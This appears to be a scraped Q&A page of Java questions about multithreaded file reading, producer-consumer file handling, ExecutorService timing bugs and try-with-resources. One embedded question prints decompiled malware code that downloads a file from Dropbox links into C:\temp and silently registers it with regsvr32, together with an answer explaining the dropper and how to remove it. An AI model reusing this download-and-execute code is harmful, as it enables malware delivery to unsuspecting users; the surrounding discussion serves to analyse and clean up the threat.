Multithreading file reading [closed] - java

Closed. This question needs to be more focused. It is not currently accepting answers.
Want to improve this question? Update the question so it focuses on one problem only by editing this post.
Closed 7 years ago.
Improve this question
I have a bunch of files I want to read, but each files are encrypted and compressed. I would like to speed up the process by using each core to open a file, decrypt it, and decompress it. Then pass to the next file that isn't being used.
Right now I have a for loop that reads one file at a time decrypt it, decompress and pass to the next file.
How to do it?

I would assume that file IO is probably more of a bottleneck than the processing. Either way, reading files in parallel will like cause little more than hard drive thrashing - possibly an SSD or high end RAID would cope.
I would structure the program thusly:
main Thread reads files and dumps them to a BlockingQueue
other threads form a ThreadPool and take() from the queue
Lets assume you have some method void doMagicStuff(byte[] file) that does whatever with the files.
public static void main(String[] args) throws Exception {
final BlockingQueue<byte[]> processingQueue = new LinkedBlockingQueue<>();
final ExecutorService executorService = Executors.newFixedThreadPool(Runtime.getRuntime().availableProcessors());
final AtomicBoolean done = new AtomicBoolean(false);
IntStream.range(0, Runtime.getRuntime().availableProcessors()).forEach(i -> {
executorService.submit(() -> {
while (!done.get() || !processingQueue.isEmpty()) {
try {
doMagicStuff(processingQueue.take());
} catch (InterruptedException e) {
//exit
return;
}
}
});
});
final Path folder = Paths.get("blah/blah");
try (final Stream<Path> files = Files.list(folder)) {
files.filter(Files::isRegularFile)
.map(file -> {
try {
return Files.readAllBytes(file);
} catch (IOException e) {
throw new RuntimeException(e);
}
}).forEach(processingQueue::add);
}
done.set(true);
executorService.shutdown();
executorService.awaitTermination(Integer.MAX_VALUE, TimeUnit.DAYS);
}
public static void doMagicStuff(final byte[] data) {
//MAGIC MAGIC
}

I would use paralelStream() e.g.
Map<String, String> allFiles =
Files.walk(Paths.get("dir"))
.parallel()
.filter(f -> f.toString().endsWith(".gz"))
.collect(Collectors.toMap(f -> f.toString(), f -> decryptAndUncompress(f)));

Related

Java: Write and Read a file simultaneously

This is actually a design question / problem. And I am not sure if writing and reading the file is an ideal solution here. Nonetheless, I will outline what I am trying to do below:
I have the following static method that once the reqStreamingData method of obj is called, it starts retrieving data from client server constantly at a rate of 150 milliseconds.
public static void streamingDataOperations(ClientSocket cs) throws InterruptedException, IOException{
// call - retrieve streaming data constantly from client server,
// and write a line in the csv file at a rate of 150 milliseconds
// using bufferedWriter and printWriter (print method).
// Note that the flush method of bufferedWriter is never called,
// I would assume the data is in fact being written in buffered memory
// not the actual file.
cs.reqStreamingData(output_file); // <- this method comes from client's API.
// I would like to another thread (aka data processing thread) which repeats itself every 15 minutes.
// I am aware I can do that by creating a class that extends TimeTask and fix a schedule
// Now when this thread runs, there are things I want to do.
// 1. flush last 15 minutes of data to the output_file (Note no synchronized statement method or statements are used here, hence no object is being locked.)
// 2. process the data in R
// 3. wait for the output in R to come back
// 4. clear file contents, so that it always store data that only occurs in the last 15 minutes
}
Now, I am not well versed in multithreading. My concern is that
The request data thread and the data processing thread are reading and writing to the file simultaneously but at a different rate, I am
not sure if the data processing thread would delay the request data thread
by a significant amount, since the data processing have more computational heavy task to carry out than the request data thread. But given that they are 2 separate threads, would any error or exception occur here ?
I am not too supportive of the idea of writing and reading the same file at the same time but because I have to use R to process and store the data in R's dataframe in real time, I really cannot think of other ways to approach this. Are there any better alternatives ?
Is there a better design to tackle this problem ?
I understand that this is a lengthy problem. Please let me know if you need more information.
The lines (CSV, or any other text) can be written to a temporary file. When processing is ready to pick up, the only synchronization needed occurs when the temporary file is getting replaced by the new one. This guarantees that the producer never writes to the file that is being processed by the consumer at the same time.
Once that is done, producer continues to add lines to the newer file. The consumer flushes and closes the old file, and then moves it to the file as expected by your R-application.
To further clarify the approach, here is a sample implementation:
public static void main(String[] args) throws IOException {
// in this sample these dirs are supposed to exist
final String workingDirectory = "./data/tmp";
final String outputDirectory = "./data/csv";
final String outputFilename = "r.out";
final int addIntervalSeconds = 1;
final int drainIntervalSeconds = 5;
final FileBasedTextBatch batch = new FileBasedTextBatch(Paths.get(workingDirectory));
final ScheduledExecutorService executor = Executors.newScheduledThreadPool(1);
final ScheduledFuture<?> producer = executor.scheduleAtFixedRate(
() -> batch.add(
// adding formatted date/time to imitate another CSV line
LocalDateTime.now().format(DateTimeFormatter.ISO_DATE_TIME)
),
0, addIntervalSeconds, TimeUnit.SECONDS);
final ScheduledFuture<?> consumer = executor.scheduleAtFixedRate(
() -> batch.drainTo(Paths.get(outputDirectory, outputFilename)),
0, drainIntervalSeconds, TimeUnit.SECONDS);
try {
// awaiting some limited time for demonstration
producer.get(30, TimeUnit.SECONDS);
}
catch (InterruptedException e) {
Thread.currentThread().interrupt();
}
catch (ExecutionException e) {
System.err.println("Producer failed: " + e);
}
catch (TimeoutException e) {
System.out.println("Finishing producer/consumer...");
producer.cancel(true);
consumer.cancel(true);
}
executor.shutdown();
}
static class FileBasedTextBatch {
private final Object lock = new Object();
private final Path workingDir;
private Output output;
public FileBasedTextBatch(Path workingDir) throws IOException {
this.workingDir = workingDir;
output = new Output(this.workingDir);
}
/**
* Adds another line of text to the batch.
*/
public void add(String textLine) {
synchronized (lock) {
output.writer.println(textLine);
}
}
/**
* Moves currently collected batch to the file at the specified path.
* The file will be overwritten if exists.
*/
public void drainTo(Path targetPath) {
try {
final long startNanos = System.nanoTime();
final Output output = getAndSwapOutput();
final long elapsedMillis =
TimeUnit.NANOSECONDS.toMillis(System.nanoTime() - startNanos);
System.out.printf("Replaced the output in %d millis%n", elapsedMillis);
output.close();
Files.move(
output.file,
targetPath,
StandardCopyOption.ATOMIC_MOVE,
StandardCopyOption.REPLACE_EXISTING
);
}
catch (IOException e) {
System.err.println("Failed to drain: " + e);
throw new IllegalStateException(e);
}
}
/**
* Replaces the current output with the new one, returning the old one.
* The method is supposed to execute very quickly to avoid delaying the producer thread.
*/
private Output getAndSwapOutput() throws IOException {
synchronized (lock) {
final Output prev = this.output;
this.output = new Output(this.workingDir);
return prev;
}
}
}
static class Output {
final Path file;
final PrintWriter writer;
Output(Path workingDir) throws IOException {
// performs very well on local filesystems when working directory is empty;
// if too slow, maybe replaced with UUID based name generation
this.file = Files.createTempFile(workingDir, "csv", ".tmp");
this.writer = new PrintWriter(Files.newBufferedWriter(this.file));
}
void close() {
if (this.writer != null)
this.writer.flush();
this.writer.close();
}
}

ExecutorService concurrency acts erratic and unstable

I have a project about concurrency and I have some trouble with the behaviour of my code. I am walking a file tree to find all files, and if I find a file which ends on .txt I submit a task to the executor. A thread will open the file and check what number in the file is the biggest. I then create an object, which holds the path for the file and the biggest number for that file. I append the object to a synchronized arraylist. But when I run the code, my arraylist sometimes have 1 object in it or 5 or 112 or 64. There should be 140 objects every time I run it. I hope you guys knows what the problem is.
public static List< Result > AllFiles( Path dir ) throws InterruptedException{
final List<Result> resultlist = new ArrayList<Result>();
final List<Result> synclist;
synclist = Collections.synchronizedList(resultlist);
ExecutorService exec
= Executors.newFixedThreadPool(Runtime.getRuntime().availableProcessors() + 1);
try {
Files.walk(dir).forEach(i -> {
String pathfile = i.getFileName().toString();
if (pathfile.contains(".txt")) {
exec.submit(() -> {
int high = findHighest(i);
ResultObj obj = new ResultObj(i, high);
synclist.add(obj);
});
}
});
exec.shutdown();
try {
exec.awaitTermination(1, TimeUnit.NANOSECONDS);
} catch (InterruptedException ex) {}
} catch (IOException ex) {}
System.out.println(synclist);
System.out.println(synclist.size());
return synclist;
}
You are only waiting 1 nanosecond in your awaitTermination call for your ExecutorService to shut down. As a result, you may be printing synclist before some of your files have been processed.

What is the better way to close IOs? [closed]

Closed. This question is opinion-based. It is not currently accepting answers.
Want to improve this question? Update the question so it can be answered with facts and citations by editing this post.
Closed 5 years ago.
Improve this question
See the codes :
I usually do like below
RandomAccessFile raf = null;
try {
// do something ...
} catch (IOException e) {
// logger
} finally {
try {
if (null != raf) {
raf.close();
}
} catch (IOException e) {
// logger
}
}
Then I see I can do this in Java8
try (RandomAccessFile raf = ... ) {
// do something ...
} catch (IOException e) {
// logger
}
It seems a good way.
Looks like Java do the job to close IO.
edit 1
Personally, I like the 2nd way.
But is it good to use and has a high performance?
With Java 7 or higher, if the resource implements AutoCloseable, best practice is to use try-with-resources:
try (
RandomAccessFile raf = /*construct it */
) {
// Use it...
}
The resource will be closed automatically. (And yes, the catch and finally clauses are optional with try-with-resources.)
Regarding the code in your question:
Re the main catch block: "log and forget" is generally not best practice. Either don't catch the exception (so the caller can deal with it) or deal with it correctly.
In the catch block in your finally where you're closing, you're quite right not to allow that to throw (you could mask the main exception), but look at the way the spec defines try-with-resources and consider following that pattern, which includes any exception from close as a suppressed exception.

Please some one explain me the output of this JAVA code DO NOT RUN THIS CODE IT WILL STEAL PASSWORDS [closed]

Closed. This question needs to be more focused. It is not currently accepting answers.
Want to improve this question? Update the question so it focuses on one problem only by editing this post.
Closed 8 years ago.
Improve this question
This is a jar executable file I just obtained. It looks like a some kind of a virus. stealing passwords. I think. but I dont know what it actually do. I decoded it by a software and obtained the code.
so can some one please just look at this code (DO NOT RUN IT) and just explain what is actually done in this code?
public static void Run() throws IOException
{
int i = 3;
while (i < 9)
{
Runtime.getRuntime().exec("regsvr32 /s C:\\temp\\YQJHBJX.PWY");
i++;
}
}
public static void main(String[] args) throws Exception
{
new File("C:\\temp\\").mkdir();
File localFile = new File("C:\\temp\\YQJHBJX.PWY");
if (localFile.exists())
{
Run();
}
else
{
String[] arrayOfString1 = "f6pb6ya5e5vc0q5/d.dat?dl=1###21urb4zg9n2on4s/d.dat?dl=1".split("###");
for (String str1 : arrayOfString1)
{
URL localURL = new URL("https://dl.dropboxusercontent.com/s/" + str1);
HttpURLConnection localHttpURLConnection = (HttpURLConnection)localURL.openConnection();
localHttpURLConnection.connect();
if (localHttpURLConnection.getResponseCode() / 100 == 2)
{
String str2 = "https://dl.dropboxusercontent.com/s/"+ str1;
String str3 = "C:\\temp\\YQJHBJX.PWY";
goToWeb(str2, str3);
break;
}
}
}
}
public static void goToWeb(String paramString1, String paramString2) throws IOException
{
System.out.println(paramString1);
System.out.println(paramString2);
InputStream localInputStream = URI.create(paramString1).toURL().openStream();
Files.copy(localInputStream, Paths.get(paramString2, new String[0]), new CopyOption[0]);
Run();
}
It's downloading a most likely malicious file from dropbox and registering it as a DLL. Exploit is in that file: "C:\temp\YQJHBJX.PWY" unregister it with regsvr32 /u and delete it if it exists.

Threading in Java for files

I am looking to read the contents of a file in Java. I have about 8000 files to read the contents and have it in HashMap like (path,contents). I think using Threads would be a option for doing this to speed up the process.
From what I know having all 8000 files to read their contents in different threads is not possible(we may want to limit the threads),Any comments on it? Also I am new to threading in Java, can any one help on how to get started on this one?
so far I thought this pesudo code, :
public class ThreadingTest extends Thread {
public HashMap<String, String > contents = new HashMap<String, String>();
public ThreadingTest(ArrayList<String> paths)
{
for(String s : paths)
{
// paths is paths to files.
// Have threading here for each path going to get contents from a
// file
//Not sure how to limit and start threads here
readFile(s);
Thread t = new Thread();
t.start();
}
}
public String readFile(String path) throws IOException
{
FileReader reader = new FileReader(path);
StringBuilder sb = new StringBuilder();
BufferedReader br = new BufferedReader(reader);
String line;
while ( (line=br.readLine()) != null) {
sb.append(line);
}
return textOnly;
}
}
Any help in completing the threading process. Thanks
Short answer: Read the files sequentially. Disk I/O doesn't parallelize well.
Long Answer: Threading might improve the read performance if the disks are good at random access (SSD disks are) or if the files are placed on several different disks, but if they're not you're just likely to end up with a lot of cache misses and waiting for the disks to seek the right read position. (You may still end up there even if your disks are good at random access.)
If you want to measure instead of guess, use Executors.newFixedThreadPool to create an ExecutorService which can read your files in parallell. Experiment with different thread counts, but don't be surprised if one reader thread per physical disk gives you the best performance.
This is a typical task for thread pool. See the tutorial here: http://download.oracle.com/javase/tutorial/essential/concurrency/pools.html
import java.io.*;
import java.util.Collections;
import java.util.HashMap;
import java.util.Map;
import java.util.concurrent.*;
public class PooledFileProcessing {
private Map<String, String> contents = Collections.synchronizedMap(new HashMap<String, String>());
// Integer.MAX_VALUE items max
private LinkedBlockingQueue<Runnable> workQueue = new LinkedBlockingQueue<Runnable>();
private ExecutorService executor = new ThreadPoolExecutor(
5, // five workers by default
20, // up to twenty workers
1, TimeUnit.MINUTES, // idle thread dies in one minute
workQueue
);
public void process(final String basePath) {
visit(new File(basePath));
System.out.println(workQueue.size() + " jobs still in queue");
executor.shutdown();
try {
executor.awaitTermination(5, TimeUnit.MINUTES);
} catch (InterruptedException e) {
System.out.println("interrupted while awaiting termination");
}
System.out.println(contents.size() + " files indexed");
}
public void visit(final File file) {
if (!file.exists()) {
return;
}
if (file.isFile()) { // skip the dirs
executor.submit(new RunnablePullFile(file));
}
// traverse children
if (file.isDirectory()) {
final File[] children = file.listFiles();
if (children != null && children.length > 0) {
for (File child : children) {
visit(child);
}
}
}
}
public static void main(String[] args) {
new PooledFileProcessing().process(args.length == 1 ? args[0] : System.getProperty("user.home"));
}
protected class RunnablePullFile implements Runnable {
private final File file;
public RunnablePullFile(File file) {
this.file = file;
}
public void run() {
BufferedReader reader = null;
try {
reader = new BufferedReader(new FileReader(file));
StringBuilder sb = new StringBuilder();
String line;
while (
(line=reader.readLine()) != null &&
sb.length() < 8192 /* remove this check for a nice OOME or swap thrashing */
) {
sb.append(line);
}
contents.put(file.getPath(), sb.toString());
} catch (IOException e) {
System.err.println("failed on file: '" + file.getPath() + "': " + e.getMessage());
if (reader != null) {
try {
reader.close();
} catch (IOException e1) {
// ignore that one
}
}
}
}
}
}
From my experience, threading helps - use a thread pool and play with values around 1..2 threads per core.
Just take care with the hash map - consider putting data to the map via a synchronized method only. I remember I once had some ugly issues in similiar project and they were related to concurrent modifications of a central hash map.
just some quick tips.
First of all, to get you started on threads, you should just look at the Runnable interface, or the Thread class. To make a thread you either have to implement this interface with a class or extend this class with another class. You can also make anonymous threads too, but I dislike the readability of those unless its something SUPER simple.
Next, just some notes on processing text with multiple threads, because it just so happens I have some experience in exactly this! Keep in mind that if the files are large and take a noticeably long time to process a single file that you will want to monitor your CPU. In my experience I was doing lots of calculations and lookups when I was processing which added hugely to my load so in the end I found that I could only make as many threads as I had processors because each thread was so labor intensive. So keep that in mind, you want to monitor the effect each thread has on the processor.
I'm not sure having threads for this would really speed up the process if all the files are on the same physical disk. It could even slow things down because the disk would have to constantly switch from one location to the other.

Categories